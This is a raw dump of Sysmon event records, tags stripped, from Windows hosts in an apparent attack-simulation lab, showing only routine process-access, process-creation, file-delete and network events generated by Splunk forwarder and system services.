10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1059-6216-3404-000000003902}1848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.182{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1059-6216-3404-000000003902}1848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.184{4F8D34B0-1059-6216-3404-000000003902}1848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:46.744{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2120D333CB532DF9DB66747550C7D0C,SHA256=D5664FB961440A8037FB6A6BC5F197AD455CF09BECFC4E42ED7559359F7FF132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:46.635{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFCE22AEB5B945C3F5C06353C7ABEDCF,SHA256=C7BEFF811901E8C4F9A7EA3DC87803CBADF36F0D45AB31CFC355294A6BEE7E75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:46.416{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F3E0F3841377C842B541F4FC8E8A3EC,SHA256=25DF88E2A9D1C18A53D317805157C94EEEE0438B00377D49533245944D6A21AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:46.416{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=586905CCFFE1BC9B0EA23338ADF2ADCC,SHA256=71A30CDDFE0429AEEB4A66CAEAA7F362CFC045F390C1C94A1641838A74A08273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:47.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17B57ECB1FF24C6C4A75D72F872D96E8,SHA256=A6B30C4A02236A898758D02B1B6117BE2AF041EBD1897B5794E71E0BBCE9762E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.635{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D6198E390C7B44BAAEA98A3066226DC,SHA256=D3F0BEBBD9F440AAC42B15A8C554E5217CACFA569AC910D04B7D0A712AAF2212,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:45.309{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51280-false10.0.1.12-8089- 10341000x8000000000000000215769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-105B-6216-3604-000000003902}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-105B-6216-3604-000000003902}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.385{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-105B-6216-3604-000000003902}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:47.386{4F8D34B0-105B-6216-3604-000000003902}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 